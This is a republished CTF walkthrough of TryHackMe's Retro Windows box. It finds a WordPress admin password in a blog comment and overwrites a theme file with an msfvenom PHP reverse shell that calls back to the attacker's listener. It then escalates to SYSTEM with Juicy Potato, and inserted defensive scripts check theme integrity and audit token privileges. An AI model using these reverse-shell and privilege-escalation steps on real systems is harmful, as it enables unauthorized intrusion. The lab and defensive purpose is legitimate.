Retro for CTF of wordpress-泓源视野


Retro is a free Windows box offered by TryHackMe.

What you’ll learn

  • Importance of different wordlists
  • Consequence of SeImpersonatePrivilege

Port scans

One thing I noticed with TryHackMe is that the OpenVPN tunnel it creates is a tun0 interface, rather than tap0 or the hypervisor-created eth0. This poses a problem for Unicornscan, which seems to work over a layer-2 (Ethernet) interface but not a layer-3 one. This was discussed in an HTB thread here. Unicornscan gave the error

Send exiting main didnt connect, exiting: system error Interrupted system call

Consequently I stuck with masscan, which worked for TCP scans. UDP scans, on the other hand, depend on the application protocol replying, and don’t seem to work reliably with most scanners, including nmap (see here for an open TFTP port nmap didn’t detect). nmap is probably still your best chance though.

root@Kali:~/TryHackme/Retro# masscan -p1-65535,U:1-65535 10.10.208.121 --rate=600 -e tun0
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-03-28 13:32:10 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.208.198
Discovered open port 3389/tcp on 10.10.208.198 

Just two ports. Perfect. The TCP service scan is here; there seems to be nothing special in the nmap results though.

Web scans

These seemed to return nothing either.

amap v5.4 (www.thc.org/thc-amap) started at 2020-03-28 21:54:36 - APPLICATION MAPPING mode
Protocol on 10.10.208.198:80/tcp matches http
Protocol on 10.10.208.198:80/tcp matches http-apache-2
Protocol on 10.10.208.198:80/tcp matches http-iis
Unidentified ports: none.
amap v5.4 finished at 2020-03-28 21:54:36
root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.198:80 -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.208.198:80
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/28 21:55:16 Starting gobuster
===============================================================
===============================================================
2020/03/28 21:56:47 Finished
===============================================================
Routed through Burp, using an old User-Agent header:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.198:80 -w /usr/share/dirb/wordlists/common.txt -p http://localhost:8081
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.208.198:80
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] Proxy: http://localhost:8081
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/28 22:04:01 Starting gobuster
===============================================================
===============================================================
2020/03/28 22:08:03 Finished
===============================================================

It took me some time, but apparently the wordlist I used was insufficient. If I had used /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt instead, I would have found this.

root@Kali:~/TryHackme/Retro# gobuster dir -u http://192.168.92.134:80 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.218.121:80
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/29 14:57:25 Starting gobuster
===============================================================
/retro (Status: 301)
/Retro (Status: 301)
===============================================================
2020/03/29 14:57:43 Finished
===============================================================

That, or I could have taken the hint that the name of the box might be an important web path. Further scanning down this path gave

root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.121:80/retro -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.208.121:80/retro
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/28 22:15:06 Starting gobuster
===============================================================
/index.php (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
===============================================================
2020/03/28 22:16:39 Finished
===============================================================

So we have a WordPress blog. But for some reason, with Burp as proxy I kept getting redirected to localhost:80, which of course loaded nothing, so I had to do this to redirect it back.

root@Kali:~/TryHackme/Retro# ssh -L 80:10.10.208.121:80 localhost
root@localhost's password:
Linux Kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Sat Mar 28 20:35:25 2020 from ::1

That’s SSH local port forwarding, where you bind one of your own machine’s ports to a port on a remote server, like

ssh -L 8080:www.ubuntuforums.org:80 localhost

Now you can visit http://localhost:8080 to reach http://www.ubuntuforums.org:80.

After doing this I could visit http://10.10.208.121/retro/wp-admin. If you didn’t encounter this problem, don’t do this. After I upgraded Burp Suite, the problem stopped. The site looks like this

[Screenshot of the site]

Now I had to point all my scans at localhost:80. Since we have a WP site, I ran wpscan, which annoyingly moved to a freemium model limited to 5 results per day. Results here. This didn’t lead anywhere, since the vulnerabilities identified were XSS or required you to already have some login access to the WP site.

WordPress login

The only way forward was to notice this comment.

[Screenshot of the comment]

which said

Wade
December 9, 2019
Leaving myself a note here just in case I forget how to spell it: parzival

If you try it on the WordPress admin login page (/retro/wp-login.php) it works (user: Wade, password: parzival).

Exploitation

Checking the Users section, we see quickly that Wade is a WP admin. Great.

[Screenshot of the Users page]

That means we have rights to edit WP themes and replace them with our own code. Typically the WordPress exploitation-to-shell vector requires two things.

  1. Uploading a reverse web shell.
  2. LFI, or otherwise being able to browse to that shell so it gets executed.

The theme used is 90’s Retro. Going to Appearance -> Theme Editor we can choose whichever page to edit. The best choice is usually 404.php, since that page loads whenever a non-existent page is requested on the WP site; the request gets routed there, triggering the reverse shell. This time, though, I chose another page, page.php.

Now we just need a PHP reverse shell, so get it via msfvenom.

root@Kali:~/TryHackme/Retro# msfvenom -a php --platform php -p php/reverse_php LHOST=10.9.21.147 LPORT=443 -o shell.php
No encoder or badchars specified, outputting raw payload
Payload size: 3044 bytes
Saved as: shell.php

Just copy and paste the entire PHP code, overwriting the existing code completely. Don’t leave any of the original code behind; I say this because when I first did it, I couldn’t get the reverse shell to trigger until I completely overwrote it. OK, now we just need to find a way to view page.php. Where could that be?
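From the defender’s side, the thing to notice in the step above is that the theme editor writes a whole new PHP file to disk. The following is an added example, not code from this walkthrough or from WordPress: a small Python script that baselines the file hashes of a theme directory and reports files that were modified, added or removed since the baseline was taken. The theme name, file contents and the scenario in demo() are constructed for illustration.

```python
"""Baseline-and-diff integrity check for a WordPress theme directory.

A theme edited through Appearance -> Theme Editor changes a file on disk;
comparing file hashes against a known-good baseline is the simplest way to
notice that. The demo input is a constructed fake theme, not a real install.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large assets are not loaded whole."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(theme_dir: Path) -> dict[str, str]:
    """Map each file under theme_dir (relative, forward-slash path) to its hash."""
    return {
        p.relative_to(theme_dir).as_posix(): hash_file(p)
        for p in sorted(theme_dir.rglob("*"))
        if p.is_file()
    }


def diff_snapshots(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Classify files as modified, added or removed relative to the baseline."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def check_theme(theme_dir: Path, baseline_file: Path) -> dict[str, list[str]]:
    """Create the baseline on the first run; on later runs, report drift from it."""
    current = snapshot(theme_dir)
    if not baseline_file.exists():
        baseline_file.write_text(json.dumps(current, indent=2, sort_keys=True))
        return {"modified": [], "added": [], "removed": []}
    baseline = json.loads(baseline_file.read_text())
    return diff_snapshots(baseline, current)


def demo() -> dict[str, list[str]]:
    """Constructed scenario: a clean theme is baselined, then one template is
    overwritten, a new PHP file appears and one file disappears."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "themes" / "example-theme"  # hypothetical theme name
        theme.mkdir(parents=True)
        (theme / "page.php").write_text("<?php get_header(); the_content(); get_footer();\n")
        (theme / "404.php").write_text("<?php get_header(); echo 'Not found'; get_footer();\n")
        (theme / "style.css").write_text("/* Theme Name: Example Theme */\n")
        baseline = Path(tmp) / "theme-baseline.json"

        first = check_theme(theme, baseline)  # baseline written, nothing to report yet
        assert first == {"modified": [], "added": [], "removed": []}

        (theme / "page.php").write_text("<?php /* entire template replaced */\n")
        (theme / "extra.php").write_text("<?php /* file the baseline never saw */\n")
        (theme / "style.css").unlink()
        return check_theme(theme, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it once against a known-good install to write the baseline, then on a schedule, and re-baseline after legitimate theme updates. Removing the in-browser editor altogether, with define('DISALLOW_FILE_EDIT', true); in wp-config.php, closes the path used in this write-up and is the better fix.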

I could access the twentynineteen theme’s readme.txt here

http://10.10.218.121/retro/wp-content/themes/twentynineteen/readme.txt

so I just needed to figure out the web path for the 90’s Retro theme. After some Googling, I found its GitHub repo. The URL suggested the path could be /90s-retro/. Accessing http://10.10.218.121/retro/wp-content/themes/90s-retro/readme.txt works! So the uploaded reverse shell would be at http://10.10.218.121/retro/wp-content/themes/90s-retro/page.php

root@Kali:~/TryHackme/Retro# curl http://10.10.218.121/retro/wp-content/themes/90s-retro/page.php

Our listener (I switched from port 53 to 443 with another shell):

root@Kali:~/TryHackme/Retro# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.21.147] from (UNKNOWN) [10.10.208.121] 52344
whoami && ipconfig /all
nt authority\iusr
Windows IP Configuration

   Host Name . . . . . . . . . . . . : RetroWeb
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : eu-west-1.ec2-utilities.amazonaws.com
                                       eu-west-1.compute.internal

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Description . . . . . . . . . . . : AWS PV Network Device #0
   Physical Address. . . . . . . . . : 02-95-6F-53-23-2E
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::8d1d:a2be:a594:99d7%5(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.208.198(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Saturday, March 28, 2020 6:29:56 AM
   Lease Expires . . . . . . . . . . : Saturday, March 28, 2020 8:29:56 AM
   Default Gateway . . . . . . . . . : 10.10.0.1
   DHCP Server . . . . . . . . . . . : 10.10.0.1
   DHCPv6 IAID . . . . . . . . . . . : 100805359
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28
   DNS Servers . . . . . . . . . . . : 10.0.0.2
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:ce5:276b:f5f5:2f39(Preferred)
   Link-local IPv6 Address . . . . . : fe80::ce5:276b:f5f5:2f39%2(Preferred)
   Default Gateway . . . . . . . . . : ::
   DHCPv6 IAID . . . . . . . . . . . : 134217728
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28
   NetBIOS over Tcpip. . . . . . . . : Disabled

Tunnel adapter isatap.eu-west-1.compute.internal:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

As per other walkthroughs, the credentials work for RDP too, the other open port on the box. If you’re going down that route, I prefer FreeRDP over rdesktop. This command is my go-to:

root@Kali:~/TryHackme/Retro# xfreerdp /v:10.10.218.121:3389 /u:Wade /p:parzival /size:90%

where /size scales the window to 90% of your desktop resolution. Experiment and see what works for you. Just for the record, I tried other PHP reverse shells such as this one and Pentestmonkey’s (replacing with cmd), but they didn’t work. Only msfvenom’s worked for me.

Post-exploitation

There are a few ways to achieve SYSTEM here. The intended method, explained here, didn’t work for me. What worked was either a kernel exploit specific to this version of Windows or the Juicy Potato exploit. First note our privileges (we are IUSR, the IIS user). winPEAS highlights this too.

whoami /all
USER INFORMATION
----------------
User Name SID
================= ========
nt authority\iusr S-1-5-17
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
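As an added example (my code, not the walkthrough’s or any tool’s), the following Python parser reads the privileges table that whoami /priv prints, in the same layout as the output above, and flags enabled privileges that let a process obtain or use another account’s token. That is the check an auditor runs across service accounts to find the situation this box demonstrates. The sample input is constructed from the three rows above plus one Disabled row, and the set of privileges flagged in TOKEN_PRIVILEGES is my choice for an audit.

```python
"""Audit helper: parse `whoami /priv` (or the privileges section of `whoami /all`)
and flag enabled privileges that allow impersonating or assigning another
account's token. The sample below is constructed from the table layout whoami prints."""

# Privileges an auditor should not expect a web-facing service account to need.
# SeImpersonatePrivilege is the one IIS and service accounts hold by default and
# the one shown on this box; the others are its usual companions in a review.
TOKEN_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeTcbPrivilege",
    "SeDebugPrivilege",
}

# Constructed sample: the three privileges IUSR showed above, plus a Disabled
# row added so that the State column handling is exercised.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State
======================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled
SeShutdownPrivilege     Shut down the system                      Disabled
"""


def parse_whoami_priv(text: str) -> dict[str, dict]:
    """Return {privilege_name: {"description": str, "enabled": bool}}.

    Walks to the PRIVILEGES INFORMATION header, skips to the '====' ruler that
    precedes the rows, then reads rows until a blank line or end of input. The
    privilege name is the first column and the state the last; everything in
    between is the free-text description.
    """
    privileges: dict[str, dict] = {}
    phase = "seek-header"
    for raw in text.splitlines():
        line = raw.strip()
        if phase == "seek-header":
            if line.upper().startswith("PRIVILEGES INFORMATION"):
                phase = "seek-ruler"
        elif phase == "seek-ruler":
            if line.startswith("==="):
                phase = "rows"
        else:  # phase == "rows"
            if not line:
                break  # blank line ends the table
            parts = line.split()
            if len(parts) < 3 or not parts[0].startswith("Se"):
                continue  # not a privilege row
            name, state_word = parts[0], parts[-1]
            privileges[name] = {
                "description": " ".join(parts[1:-1]),
                "enabled": state_word.lower() == "enabled",
            }
    return privileges


def flag_token_privileges(text: str) -> list[str]:
    """Names from TOKEN_PRIVILEGES that are present and enabled in the output."""
    privs = parse_whoami_priv(text)
    return sorted(name for name, info in privs.items()
                  if name in TOKEN_PRIVILEGES and info["enabled"])


if __name__ == "__main__":
    for name, info in parse_whoami_priv(SAMPLE_WHOAMI_PRIV).items():
        state = "enabled" if info["enabled"] else "disabled"
        print(f"{name:<26} {state:<9} {info['description']}")
    print("review:", flag_token_privileges(SAMPLE_WHOAMI_PRIV))
```

Feed it the saved output of whoami /priv from each service account you review. Since IIS application pool and service accounts hold SeImpersonatePrivilege by design, the practical mitigation is not to strip the privilege but to stop attacker-supplied code from running under those accounts in the first place (the theme editor above) and to run a Windows build that no longer honours the DCOM trick Juicy Potato relies on (Windows Server 2019 and Windows 10 1809 onward); this box reports build 10.0.14393, which is Server 2016.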

We have SeImpersonatePrivilege. That means we can use Juicy Potato. Call it like this:

JuicyPotato.exe -l 443 -p C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro\temp\shell443.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
Testing {5B3E6773-3A99-4A3D-8096-7765DD11785C} 443
......
[+] authresult 0
{5B3E6773-3A99-4A3D-8096-7765DD11785C};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK

We should get a SYSTEM shell:

root@Kali:~/TryHackme/Retro# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.21.147] from (UNKNOWN) [10.10.218.121] 50079
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami /priv && ipconfig
whoami /priv && ipconfig
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Windows IP Configuration

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::acad:1add:8c0f:6899%5
   IPv4 Address. . . . . . . . . . . : 10.10.218.121
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.10.0.1

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:3874:3db0:f5f5:2586
   Link-local IPv6 Address . . . . . : fe80::3874:3db0:f5f5:2586%2
   Default Gateway . . . . . . . . . : ::

Tunnel adapter isatap.eu-west-1.compute.internal:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
This article was published on 泓源视野 by the author admin; copyright belongs to 泓源视野. The content represents the author’s personal views and does not imply that 泓源视野 endorses or supports them. If reproducing it, please credit the source.